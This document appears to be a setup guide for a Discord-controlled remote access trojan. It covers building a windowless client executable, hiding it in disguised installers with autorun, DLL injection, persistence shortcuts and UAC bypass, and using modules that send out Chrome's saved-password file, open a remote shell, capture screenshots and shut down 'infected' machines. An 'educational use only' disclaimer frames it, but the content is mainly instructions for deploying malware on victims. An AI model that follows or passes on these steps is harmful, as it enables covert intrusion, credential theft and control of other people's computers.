This software is intended solely for educational purposes and authorized security testing. Unauthorized use for malicious activities is strictly prohibited. The author is not responsible for any misuse.
- Click on "Add Server" in Discord.
- Select "Create my own".
- This selection doesn't matter; pick anything you like.
- Name the server anything you like; the name doesn't matter either.
Your server is now created! Now we will set up your bot to create a control center.
- Go to the Discord developer website here.
- Select New Application. Name it whatever you'd like, it does not matter.
- Select the "Bot" tab after creating the application. Give it any profile picture and banner; they don't matter.
- Scroll down and ensure that the Message Content intent is switched on. Without it the bot cannot read the text of the messages you send as commands.
- Navigate to the OAuth2 tab on the left sidebar.
- Scroll down and ensure "bot" is selected.
- Scroll down again and select "Administrator." Note that Administrator grants the bot every permission on the server; if you prefer least privilege, a narrower set covering what the modules below actually do (view and manage channels, send and read messages, attach files) works as well.
- Scroll down once more, ensure the link is set to "Guild Install", then copy the generated URL.
- Enter the generated URL into your web browser, then add your bot to your server.
- Go back to the GitHub link and download discord_bot.py, userclient.py, and requirements.txt. You will need Python installed, plus the pip libraries the scripts depend on. You can install the necessary libraries by running the command below.
pip install -r requirements.txt
- Navigate back to the Discord developer site and click "Bot".
- Copy your bot token. Treat it as a secret: anyone who has the token can control the bot and, through it, every machine the bot reaches.
- Open the source code of both files and replace the placeholder Discord token with the token you just copied. Be aware that the token and channel ID are compiled into userclient.exe in the next section and can be recovered by anyone who extracts the PyInstaller archive from that binary.
- Navigate to your Discord server, right-click your text channel, and click "Copy ID". You may need to enable Developer Mode in Discord's advanced settings for this option to appear. Then paste the ID into both files.
For this portion, you will need Python and PyInstaller installed (pip install pyinstaller).
- Open a terminal in the same directory as your files with the replaced Discord token and channel ID.
- Run the following command to build the client. The --noconsole flag builds a windowed executable so no console window appears when it runs:
pyinstaller --onefile --noconsole userclient.py
- Run the following command to build the control-center bot (this one keeps its console so you can see its output):
pyinstaller --onefile discord_bot.py
DO NOT USE THIS MALICIOUSLY. USE THIS AS A PENTESTING TOOL OR FOR EDUCATIONAL PURPOSES ONLY.
- The most common method of deployment is embedding userclient.exe in a disguised installer or poisoned executable and setting it to autorun on startup. You can also build the payload as a DLL and inject it into the disguised program.
- You can also create shortcuts that re-launch the executable if the original file is removed.
- Since userclient.exe requires admin privileges for full functionality, you can apply UAC bypass techniques. Read more here.
When you launch discord_bot.py, you should be met with a welcome message on your server.
Once you have an infected computer, click Start Service. If no infected computers are online, clicking the button will set up the server for controlling the PCs, but no channels will actually be created.
However, if an infected computer is online, pressing Start Service will create a channel for each computer that is online. In my case, I have infected my own computer to test this.
Navigating to the new channel, we are greeted with several options. I will go over them in detail now.
-Send Popup
This option, when clicked, prompts you for the message to send. After typing the message into the channel and hitting Enter, a popup appears on the target machine. The bot also notifies you when the user dismisses the popup window.
-Steal Passwords
This tool locates the saved-password file for Google Chrome and sends it as a message to the Discord server. The entries in that file are still encrypted, but there are numerous decryption tools on GitHub. I will not link one here.
-Execute Commands
This module is by far the most dangerous command. It opens a shell in Discord, where you input commands by sending messages. Tread very carefully when using this command: if you don't know what you are doing you can cause SERIOUS damage, and you may also reveal your identity to a security-savvy operator whose PC is infected as a sting.
-Screenshot
This command is simple. When clicked, it takes a screenshot of all monitors and sends it to the channel. This will later be improved upon with a live-update or keylogger feature.
-Shutdown
This module just shuts down the user's computer. It can be used as an emergency "stop" if you detect the user taking steps to remove the malware.
-Commands
!clear - Clean up the interface back to its original state.
!menu - Show the context menu with the modules. Use this if you don't want to scroll up to execute modules.